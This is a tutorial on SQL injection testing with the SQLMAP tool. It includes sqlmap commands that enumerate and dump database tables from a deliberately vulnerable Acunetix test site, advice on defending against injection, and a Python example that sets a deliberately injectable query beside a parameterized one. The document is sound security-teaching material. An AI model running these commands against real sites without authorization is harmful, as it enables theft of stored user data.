Web application penetration using SQLMAP.
1. Web application penetration using SQLMAP.
2. Points to be covered
• What is SQL injection?
• What is SQLMAP?
• How do SQL injection attacks work?
• Steps
• Ways to protect websites from SQL injection
3. What is SQL Injection?
It is a type of code injection technique that makes it possible to execute malicious SQL queries, which can control a database server behind a web application. Attackers can gain access to information stored in databases. They can also use SQL injection to add, modify, and delete records in the database.
4. What is SQLMAP?
• SQLMAP is a tool that ships with Kali Linux and makes the task of SQL injection easier for a penetration tester.
• SQLMAP is open source.
• SQLMAP comes with a powerful engine that enables it to fingerprint the database server, fetch data from the database server, access the underlying file system and execute commands on the server operating system.
• Feature support of SQLMAP includes: full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
• These are practically all the DBMS. Most common
5. Penetration Testing Using SQLMAP
• For this ISE we will be using http://testphp.vulnweb.com/ as our test web application for penetration testing with SQLMAP. You can visit the website; it is a deliberately vulnerable test application by Acunetix.
6. How do SQL injection attacks work?
• Find a web application that is vulnerable to SQL injection (SQLi) attacks. Vulnerability has two criteria. Firstly, it has to allow execution of queries from the URL, and secondly, it should show an error for some kind of query or other. An error is an indication of a SQL vulnerability.
• After we know that a site is vulnerable, we need to execute a few queries/SQL commands to find out what makes it act in an unexpected manner. Then we should obtain information about the SQL version, the number of tables in the database and the columns in the tables.
• Finally, we have to extract the useful information from the tables.
7. STEPS to be followed
• Open a terminal in Kali Linux and type sqlmap; for help, type sqlmap -h
• Listing the information about the existing databases:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs
• Listing the information about the tables present in a particular database:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
• Listing information about the columns of a particular table:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
• Dump the data from the columns:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C uname --dump
8. How to protect a web site or application from SQL Injection attacks:
Developers can prevent SQL injection vulnerabilities in web applications by utilizing parameterized database queries with bound, typed parameters and careful use of parameterized stored procedures in the database. This can be accomplished in a variety of programming languages including Java, .NET, PHP and more.
Additionally, developers, system administrators and database administrators can take further steps to minimize attacks or the impact of successful attacks.
9. How to protect a web site or application from SQL Injection attacks:
• Keep all web application software components, including libraries, plugins, frameworks, web server software and database server software, up to date with the latest security patches available from vendors.
• Never allow your web application to run with administrator privileges.
• Do not use shared database accounts between different web sites or applications.
• Validate user-supplied input for expected data types
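
The two defenses named on slides 8 and 9, bound typed parameters and validating input for the expected data type, are shown below next to the string-concatenation pattern they replace. This is an added example, not code from the original slides; the table layout, sample rows and function names are constructed for illustration, and SQLite is used only so the example runs offline.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT)")
    db.executemany("INSERT INTO artists VALUES (?, ?)",
                   [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return db


def lookup_vulnerable(db, artist):
    """Before: the request value is pasted into the SQL text,
    so the database parses it as part of the query."""
    sql = ("SELECT aname FROM artists WHERE artist_id = " + artist
           + " ORDER BY artist_id")
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, artist):
    """After: check the expected data type, then bind the value
    as a parameter so it is only ever treated as data."""
    try:
        artist_id = int(artist)          # expected type: integer id
    except ValueError:
        return []                        # reject anything that is not an integer
    sql = "SELECT aname FROM artists WHERE artist_id = ? ORDER BY artist_id"
    return [row[0] for row in db.execute(sql, (artist_id,))]


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 OR 1=1"):      # second value is a constructed test input
        print(repr(value), "concatenated:", lookup_vulnerable(db, value))
        print(repr(value), "validated and bound:", lookup_safe(db, value))
```

With the concatenated query, the second input changes the WHERE clause and every row comes back; with validation and binding, the same input returns nothing.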